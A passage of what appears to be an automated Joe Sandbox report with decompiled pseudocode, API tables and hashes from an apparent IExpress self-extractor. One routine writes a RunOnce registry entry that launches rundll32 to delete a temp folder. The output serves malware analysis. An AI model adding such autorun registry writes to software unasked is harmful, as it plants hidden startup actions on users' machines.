                                                                                                                                                                                                      						if(E00A6681F(_t67) == 0) {
                                                                                                                                                                                                      							L4:
                                                                                                                                                                                                      							_t64 = 0x10010;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t66 = E00A667C9(0, 0);
                                                                                                                                                                                                      							_t64 = 0x190010;
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x00a644b9
                                                                                                                                                                                                      0x00a644c4
                                                                                                                                                                                                      0x00a644cb
                                                                                                                                                                                                      0x00a644d8
                                                                                                                                                                                                      0x00a644e4
                                                                                                                                                                                                      0x00a644eb
                                                                                                                                                                                                      0x00a644ee
                                                                                                                                                                                                      0x00a644ef
                                                                                                                                                                                                      0x00a644ef
                                                                                                                                                                                                      0x00a644f1
                                                                                                                                                                                                      0x00a644f7
                                                                                                                                                                                                      0x00a644f8
                                                                                                                                                                                                      0x00a6467b
                                                                                                                                                                                                      0x00a644fe
                                                                                                                                                                                                      0x00a64509
                                                                                                                                                                                                      0x00a64518
                                                                                                                                                                                                      0x00a64525
                                                                                                                                                                                                      0x00a64562
                                                                                                                                                                                                      0x00a64568
                                                                                                                                                                                                      0x00a64568
                                                                                                                                                                                                      0x00a6456b
                                                                                                                                                                                                      0x00a6456b
                                                                                                                                                                                                      0x00a6456d
                                                                                                                                                                                                      0x00a6456e
                                                                                                                                                                                                      0x00a64572
                                                                                                                                                                                                      0x00a64578
                                                                                                                                                                                                      0x00a6457c
                                                                                                                                                                                                      0x00a645cb
                                                                                                                                                                                                      0x00a64607
                                                                                                                                                                                                      0x00a64607
                                                                                                                                                                                                      0x00a6460d
                                                                                                                                                                                                      0x00a64613
                                                                                                                                                                                                      0x00a64617
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6461d
                                                                                                                                                                                                      0x00a64623
                                                                                                                                                                                                      0x00a64626
                                                                                                                                                                                                      0x00a64628
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64628
                                                                                                                                                                                                      0x00a645cd
                                                                                                                                                                                                      0x00a645cd
                                                                                                                                                                                                      0x00a645cf
                                                                                                                                                                                                      0x00a645cf
                                                                                                                                                                                                      0x00a645d2
                                                                                                                                                                                                      0x00a645d2
                                                                                                                                                                                                      0x00a645d4
                                                                                                                                                                                                      0x00a645d5
                                                                                                                                                                                                      0x00a645db
                                                                                                                                                                                                      0x00a645de
                                                                                                                                                                                                      0x00a645e3
                                                                                                                                                                                                      0x00a645e9
                                                                                                                                                                                                      0x00a645ed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a645f3
                                                                                                                                                                                                      0x00a645fd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a64602
                                                                                                                                                                                                      0x00a645ed
                                                                                                                                                                                                      0x00a6457e
                                                                                                                                                                                                      0x00a6457e
                                                                                                                                                                                                      0x00a64580
                                                                                                                                                                                                      0x00a64580
                                                                                                                                                                                                      0x00a64583
                                                                                                                                                                                                      0x00a64583
                                                                                                                                                                                                      0x00a64585
                                                                                                                                                                                                      0x00a64586
                                                                                                                                                                                                      0x00a6458a
                                                                                                                                                                                                      0x00a6458c
                                                                                                                                                                                                      0x00a6458f
                                                                                                                                                                                                      0x00a6458f
                                                                                                                                                                                                      0x00a64591
                                                                                                                                                                                                      0x00a64592
                                                                                                                                                                                                      0x00a6459b
                                                                                                                                                                                                      0x00a6459e
                                                                                                                                                                                                      0x00a645a3
                                                                                                                                                                                                      0x00a645a9
                                                                                                                                                                                                      0x00a645ad
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a645af
                                                                                                                                                                                                      0x00a645af
                                                                                                                                                                                                      0x00a645bf
                                                                                                                                                                                                      0x00a6462d
                                                                                                                                                                                                      0x00a64630
                                                                                                                                                                                                      0x00a6463d
                                                                                                                                                                                                      0x00a6464e
                                                                                                                                                                                                      0x00a6464e
                                                                                                                                                                                                      0x00a6463f
                                                                                                                                                                                                      0x00a64640
                                                                                                                                                                                                      0x00a64647
                                                                                                                                                                                                      0x00a6464c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6464c
                                                                                                                                                                                                      0x00a64666
                                                                                                                                                                                                      0x00a6466d
                                                                                                                                                                                                      0x00a6466f
                                                                                                                                                                                                      0x00a64675
                                                                                                                                                                                                      0x00a64675
                                                                                                                                                                                                      0x00a645ad
                                                                                                                                                                                                      0x00a64527
                                                                                                                                                                                                      0x00a6452e
                                                                                                                                                                                                      0x00a6453f
                                                                                                                                                                                                      0x00a6453f
                                                                                                                                                                                                      0x00a64530
                                                                                                                                                                                                      0x00a64531
                                                                                                                                                                                                      0x00a64538
                                                                                                                                                                                                      0x00a6453d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6453d
                                                                                                                                                                                                      0x00a64554
                                                                                                                                                                                                      0x00a6455a
                                                                                                                                                                                                      0x00a6455a
                                                                                                                                                                                                      0x00a6455a
                                                                                                                                                                                                      0x00a64525
                                                                                                                                                                                                      0x00a6468c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                      • MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A645A3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A645E3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A6460D
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00A64630
                                                                                                                                                                                                      • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00A64666
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00A6466F
                                                                                                                                                                                                        • Part of subcall function 00A6681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A6686E
                                                                                                                                                                                                        • Part of subcall function 00A6681F: GetSystemMetrics.USER32(0000004A), ref: 00A668A7
                                                                                                                                                                                                        • Part of subcall function 00A6681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A668CC
                                                                                                                                                                                                        • Part of subcall function 00A6681F: RegQueryValueExA.ADVAPI32(?,00A61140,00000000,?,?,0000000C), ref: 00A668F4
                                                                                                                                                                                                        • Part of subcall function 00A6681F: RegCloseKey.ADVAPI32(?), ref: 00A66902
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                      • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                      • API String ID: 3244514340-2605220145
                                                                                                                                                                                                      • Opcode ID: ef5f16ef21767b3c124bd66afc889a51821eccae808810a1691b40e2751865a5
                                                                                                                                                                                                      • Instruction ID: 2551e117f4dc7bcd3463d3370ffea91a8fb40a0f39e0f37c0d67a46b40458b43
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef5f16ef21767b3c124bd66afc889a51821eccae808810a1691b40e2751865a5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E951F676900219AFDB21DF68CC48BAA7B79EF5A304F144194FD1AB7241DB71DD06CBA0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00A62773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v269;
                                                                                                                                                                                                      				CHAR* _v276;
                                                                                                                                                                                                      				int _v280;
                                                                                                                                                                                                      				void* _v284;
                                                                                                                                                                                                      				int _v288;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                      				int _t45;
                                                                                                                                                                                                      				int* _t50;
                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                      				CHAR* _t61;
                                                                                                                                                                                                      				char* _t62;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t52 = __ecx;
                                                                                                                                                                                                      				_t23 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                      				_t62 = _a4;
                                                                                                                                                                                                      				_t50 = 0;
                                                                                                                                                                                                      				_t61 = __ecx;
                                                                                                                                                                                                      				_v276 = _t62;
                                                                                                                                                                                                      				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                      				if( *_t62 != 0x23) {
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t64 = _t62 + 1;
                                                                                                                                                                                                      					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                      					_t34 = _v269;
                                                                                                                                                                                                      					if(_t34 == 0x53) {
                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 == 0x57) {
                                                                                                                                                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_push(_t52);
                                                                                                                                                                                                      							_v288 = 0x104;
                                                                                                                                                                                                      							E00A61781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                      							_t59 = 0x104;
                                                                                                                                                                                                      							E00A6658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                      								L16:
                                                                                                                                                                                                      								_t59 = _t63;
                                                                                                                                                                                                      								E00A6658A(_t61, _t63, _v276);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								if(RegQueryValueExA(_v284, 0xa61140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                      									_t45 = _v280;
                                                                                                                                                                                                      									if(_t45 != 2) {
                                                                                                                                                                                                      										L9:
                                                                                                                                                                                                      										if(_t45 == 1) {
                                                                                                                                                                                                      											goto L10;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      											_t45 = _v280;
                                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t59 = 0x104;
                                                                                                                                                                                                      											E00A61680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                      											L10:
                                                                                                                                                                                                      											_t50 = 1;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								RegCloseKey(_v284);
                                                                                                                                                                                                      								L15:
                                                                                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                      			}























                                                                                                                                                                                                      0x00a62773
                                                                                                                                                                                                      0x00a6277e
                                                                                                                                                                                                      0x00a62785
                                                                                                                                                                                                      0x00a6278a
                                                                                                                                                                                                      0x00a6278d
                                                                                                                                                                                                      0x00a62790
                                                                                                                                                                                                      0x00a62792
                                                                                                                                                                                                      0x00a62798
                                                                                                                                                                                                      0x00a6279d
                                                                                                                                                                                                      0x00a628b2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a627a3
                                                                                                                                                                                                      0x00a627a3
                                                                                                                                                                                                      0x00a627af
                                                                                                                                                                                                      0x00a627c2
                                                                                                                                                                                                      0x00a627c8
                                                                                                                                                                                                      0x00a627cd
                                                                                                                                                                                                      0x00a627d5
                                                                                                                                                                                                      0x00a628b7
                                                                                                                                                                                                      0x00a628b9
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a627db
                                                                                                                                                                                                      0x00a627dd
                                                                                                                                                                                                      0x00a628aa
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a627e3
                                                                                                                                                                                                      0x00a627e3
                                                                                                                                                                                                      0x00a627ec
                                                                                                                                                                                                      0x00a627f8
                                                                                                                                                                                                      0x00a62803
                                                                                                                                                                                                      0x00a6280b
                                                                                                                                                                                                      0x00a62831
                                                                                                                                                                                                      0x00a628c3
                                                                                                                                                                                                      0x00a628c9
                                                                                                                                                                                                      0x00a628cd
                                                                                                                                                                                                      0x00a62837
                                                                                                                                                                                                      0x00a6285a
                                                                                                                                                                                                      0x00a6285c
                                                                                                                                                                                                      0x00a62865
                                                                                                                                                                                                      0x00a62892
                                                                                                                                                                                                      0x00a62895
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62867
                                                                                                                                                                                                      0x00a62878
                                                                                                                                                                                                      0x00a6288c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6287a
                                                                                                                                                                                                      0x00a62880
                                                                                                                                                                                                      0x00a62885
                                                                                                                                                                                                      0x00a62897
                                                                                                                                                                                                      0x00a62899
                                                                                                                                                                                                      0x00a62899
                                                                                                                                                                                                      0x00a62878
                                                                                                                                                                                                      0x00a62865
                                                                                                                                                                                                      0x00a628a0
                                                                                                                                                                                                      0x00a628bf
                                                                                                                                                                                                      0x00a628c1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a628c1
                                                                                                                                                                                                      0x00a62831
                                                                                                                                                                                                      0x00a627dd
                                                                                                                                                                                                      0x00a627d5
                                                                                                                                                                                                      0x00a628e5

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperA.USER32(FEEDC76E,00000000,00000000,00000000), ref: 00A627A8
                                                                                                                                                                                                      • CharNextA.USER32(0000054D), ref: 00A627B5
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00A627BC
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62829
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00A61140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62852
                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62870
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A628A0
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A628AA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00A628B9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A627E4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                      • API String ID: 2659952014-2428544900
                                                                                                                                                                                                      • Opcode ID: 5d010ac85102f579502d6d1cd77dcc4858f1a8ffbb0cface446c52a4869d1d3d
                                                                                                                                                                                                      • Instruction ID: c423f08e4a79258bb6b426c9ef5658b919fa9a0a50f6b64821df633337605f79
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d010ac85102f579502d6d1cd77dcc4858f1a8ffbb0cface446c52a4869d1d3d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75419371E00128AFDB249B649C85BEA7BBDEB65700F0440A9F545E3150DBB48E868FA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                                                                      			E00A62267() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v836;
                                                                                                                                                                                                      				void* _v840;
                                                                                                                                                                                                      				int _v844;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t19 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                      				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                      				if( *0xa68530 != 0) {
                                                                                                                                                                                                      					_push(_t49);
                                                                                                                                                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                      						_push(_t38);
                                                                                                                                                                                                      						_v844 = 0x238;
                                                                                                                                                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                      							_push(_t47);
                                                                                                                                                                                                      							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      								E00A6658A( &_v268, 0x104, 0xa61140);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      							E00A6171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                      							_t42 =  &_v836;
                                                                                                                                                                                                      							_t45 = _t42 + 1;
                                                                                                                                                                                                      							_pop(_t47);
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t33 =  *_t42;
                                                                                                                                                                                                      								_t42 = _t42 + 1;
                                                                                                                                                                                                      							} while (_t33 != 0);
                                                                                                                                                                                                      							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                      						_pop(_t38);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_pop(_t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00a62272
                                                                                                                                                                                                      0x00a62277
                                                                                                                                                                                                      0x00a62279
                                                                                                                                                                                                      0x00a62283
                                                                                                                                                                                                      0x00a62289
                                                                                                                                                                                                      0x00a622ab
                                                                                                                                                                                                      0x00a622b1
                                                                                                                                                                                                      0x00a622c4
                                                                                                                                                                                                      0x00a622e0
                                                                                                                                                                                                      0x00a622e6
                                                                                                                                                                                                      0x00a622f5
                                                                                                                                                                                                      0x00a6230d
                                                                                                                                                                                                      0x00a6231c
                                                                                                                                                                                                      0x00a6231c
                                                                                                                                                                                                      0x00a62321
                                                                                                                                                                                                      0x00a6233a
                                                                                                                                                                                                      0x00a62342
                                                                                                                                                                                                      0x00a62348
                                                                                                                                                                                                      0x00a6234b
                                                                                                                                                                                                      0x00a6234c
                                                                                                                                                                                                      0x00a6234c
                                                                                                                                                                                                      0x00a6234e
                                                                                                                                                                                                      0x00a6234f
                                                                                                                                                                                                      0x00a6236e
                                                                                                                                                                                                      0x00a6236e
                                                                                                                                                                                                      0x00a6237a
                                                                                                                                                                                                      0x00a62380
                                                                                                                                                                                                      0x00a62380
                                                                                                                                                                                                      0x00a62381
                                                                                                                                                                                                      0x00a62381
                                                                                                                                                                                                      0x00a6238f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A622A3
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 00A622D8
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A622F5
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00A62305
                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A6236E
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A6237A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00A62321
                                                                                                                                                                                                      • wextract_cleanup3, xrefs: 00A6227C, 00A622CD, 00A62363
                                                                                                                                                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A6232D
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A62299
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
                                                                                                                                                                                                      • API String ID: 3027380567-1455616767
                                                                                                                                                                                                      • Opcode ID: 107cdd671dc58cf7cceed32bc8de79ebab382e6fec2fc7a53e27490fd66d2590
                                                                                                                                                                                                      • Instruction ID: c54ed9140caecfbd20015f4c79cc441a023cdb268ebea253c289284d8ee05388
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 107cdd671dc58cf7cceed32bc8de79ebab382e6fec2fc7a53e27490fd66d2590
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3318171A00218BBDB21DB61DC49FEA7B7CEB65700F0401A9F50EAA151EA75AB89CF50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                                                      			E00A63100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t8 = _a8 - 0xf;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					if( *0xa68590 == 0) {
                                                                                                                                                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                      						 *0xa68590 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t8 - 1;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L8:
                                                                                                                                                                                                      					EndDialog(_a4, ??);
                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t15 = _t11 - 0x100;
                                                                                                                                                                                                      				if(_t15 == 0) {
                                                                                                                                                                                                      					_t16 = GetDesktopWindow();
                                                                                                                                                                                                      					_t33 = _a4;
                                                                                                                                                                                                      					E00A643D0(_t33, _t16);
                                                                                                                                                                                                      					SetDlgItemTextA(_t33, 0x834,  *0xa68d4c);
                                                                                                                                                                                                      					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                      					SetForegroundWindow(_t33);
                                                                                                                                                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                      					 *0xa688b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                      					SetWindowLongA(_t34, 0xfffffffc, E00A630C0);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t15 != 1) {
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a12 != 6) {
                                                                                                                                                                                                      					if(_a12 != 7) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				goto L8;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      0x00a63108
                                                                                                                                                                                                      0x00a6310b
                                                                                                                                                                                                      0x00a631b7
                                                                                                                                                                                                      0x00a631ca
                                                                                                                                                                                                      0x00a631d0
                                                                                                                                                                                                      0x00a631d0
                                                                                                                                                                                                      0x00a631da
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a631da
                                                                                                                                                                                                      0x00a63111
                                                                                                                                                                                                      0x00a63114
                                                                                                                                                                                                      0x00a63136
                                                                                                                                                                                                      0x00a63136
                                                                                                                                                                                                      0x00a63138
                                                                                                                                                                                                      0x00a6313b
                                                                                                                                                                                                      0x00a63141
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a63143
                                                                                                                                                                                                      0x00a63116
                                                                                                                                                                                                      0x00a6311b
                                                                                                                                                                                                      0x00a6314b
